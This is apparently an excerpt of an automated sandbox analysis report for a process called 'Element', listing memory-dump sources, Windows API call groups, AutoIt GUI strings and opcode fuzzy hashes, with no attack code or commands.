                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: FileWrite$ConsoleErrorLastOutput
                    • String ID:
                    • API String ID: 2718003287-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • ReadFile.KERNEL32(?,?,00007FF6C587475D,?,?,?,00007FF6C5878FCF,?,?,?,?,?,?,?,00007FF6C5879D60), ref: 00007FF6C5879F34
                    • SetFilePointerEx.KERNEL32(?,?,00007FF6C587475D,?,?,?,00007FF6C5878FCF,?,?,?,?,?,?,?,00007FF6C5879D60), ref: 00007FF6C58BD886
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: File$PointerRead
                    • String ID:
                    • API String ID: 3154509469-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: ConsoleErrorLastMode
                    • String ID:
                    • API String ID: 953036326-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+
                    • String ID:
                    • API String ID: 2943138195-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert
                    • String ID:
                    • API String ID: 3076010158-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                    • String ID:
                    • API String ID: 4141327611-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: LongWindow$InvalidateMessageRectSend
                    • String ID:
                    • API String ID: 3340791633-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Name::operator+$Replicator::operator[]
                    • String ID:
                    • API String ID: 3863519203-0
                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3C41
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3CA3
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3CDD
                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C58AA02B,?,?,?,00007FF6C58A9FE6), ref: 00007FF6C58B3D07
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                    • String ID:
                    • API String ID: 1557788787-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: shared_ptr$Concurrency::details::_Decorator::getDisplacementSchedulerScheduler::_
                    • String ID:
                    • API String ID: 1539326353-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Client$CursorLongProcRectScreenWindow
                    • String ID:
                    • API String ID: 4127811313-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: CreateMessageObjectSendStockWindow
                    • String ID:
                    • API String ID: 3970641297-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _ctrlfp
                    • String ID:
                    • API String ID: 697997973-0
                    • Opcode ID: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                    • Instruction ID: 18272cc773c6eeb7618e1704c05a42879b969fff7c8f0bbaf687460b9eac2fdd
                    • Opcode Fuzzy Hash: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                    • Instruction Fuzzy Hash: BB11C925E0C55542D6219F3898411BBA371FF9AB85F644231F7CA9A6DADF2DE8808B00
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                    • Instruction ID: 4b3d9869f7eece76ce86851b76a7a49b50555640442a8599d2794fd7335196ee
                    • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                    • Instruction Fuzzy Hash: 862108B6A04781DFEB00CF78D8441AC77B0F748B48B004866EE5897B19EF78D954CB40
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ErrorLast$abort
                    • String ID:
                    • API String ID: 1447195878-0
                    • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                    • Instruction ID: 936d7eb6a719e4f46fc5522498e7db65334b947d6d644f0d44525e153218486b
                    • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                    • Instruction Fuzzy Hash: BE019E20B0B35642FA586F31AD6957D21515F84F93F948538D9DEC67D7EE2CFC004200
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                    • Instruction ID: 3c26184ea851d72a77a14569283f76e6539d4e2415ee399a13ce6128bcc3206d
                    • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                    • Instruction Fuzzy Hash: 5A018C31A187E182E7508F26BD087296A60BB85F95F581174DE8A43BA3CF7DE8448B40
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 3215553584-3916222277
                    • Opcode ID: 86150bdac83bff3d3a3978e067b000b41a5b794f2aaf96f349425064245c13ca
                    • Instruction ID: 49b807a9b407d5d889c8a04ea13a3ba9ad9a7eff985267a227cde296f4ae945f
                    • Opcode Fuzzy Hash: 86150bdac83bff3d3a3978e067b000b41a5b794f2aaf96f349425064245c13ca
                    • Instruction Fuzzy Hash: 3202BFB2605BC4A1EB75DB91E5B83EAA361F7A5BC0F409521DE8D53B59EF38C085CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: gfffffff
                    • API String ID: 3215553584-1523873471
                    • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                    • Instruction ID: 63cbf447b85cc3d0980f34cba2e069e62a42ef9002e796a1b487d6842434b671
                    • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                    • Instruction Fuzzy Hash: 81912763A0A3DA86EB218F2599413B86B95AB25FD1F048131EBCD873D6DE3DE911C301
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_copy__std_exception_destroy
                    • String ID: ange
                    • API String ID: 2960854011-4159947239
                    • Opcode ID: 837e788da367ebb68e83679b17b8d887118eed0f6b5a82909e9cd0bee2846e8a
                    • Instruction ID: f01cb809863208084368c4e53e8e5500e558cacf7fb938b1a621dcb406045a18
                    • Opcode Fuzzy Hash: 837e788da367ebb68e83679b17b8d887118eed0f6b5a82909e9cd0bee2846e8a
                    • Instruction Fuzzy Hash: 6AA19372A14B8491FB00CF25E4683D9B7A1E7F97A4F109312EE9C136AAEB78D5C5C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                    • Instruction ID: 22c32f5bd244813ea9753a9208399329b77158e63d0d99ec0b5b48d2cbbfd208
                    • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                    • Instruction Fuzzy Hash: E9914476604B9282DB24CF29E8502AD73B1FB88F95F518026DF9E83724EF79D845C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmp
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: e+000$gfff
                    • API String ID: 3215553584-3030954782
                    • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                    • Instruction ID: 64ca44b47df9ea0a3981bd7f5936915130af3d56eb78af4a7560fe1bb7c5cbe8
                    • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                    • Instruction Fuzzy Hash: 4C516762B1A7D246E7248F399C403696A91EB91F91F488231DBDCCBBD6CF2DD845C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: [json.exception.
                    • API String ID: 2453523683-791563284
                    • Opcode ID: 2e22769fcecba67434e96d9d783ac0464a1c11fc42a9ad46ae3cf6b6d8bcd956
                    • Instruction ID: 31aa40b5c4a99dbd099c586fde351be7df0439f228ada15f4083e57fdc6839f3
                    • Opcode Fuzzy Hash: 2e22769fcecba67434e96d9d783ac0464a1c11fc42a9ad46ae3cf6b6d8bcd956
                    • Instruction Fuzzy Hash: AC51D132A14B80A1FB10DB24E5683DD6360E7E5B90F508611EB9C43BAAEF78C6D6C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: __std_exception_destroy
                    • String ID: at line $, column
                    • API String ID: 2453523683-191570568
                    • Opcode ID: e2e9213b78b4f48b5e10b874a45c93fabeb8d2a14b92d34ea69f29d604c5b26d
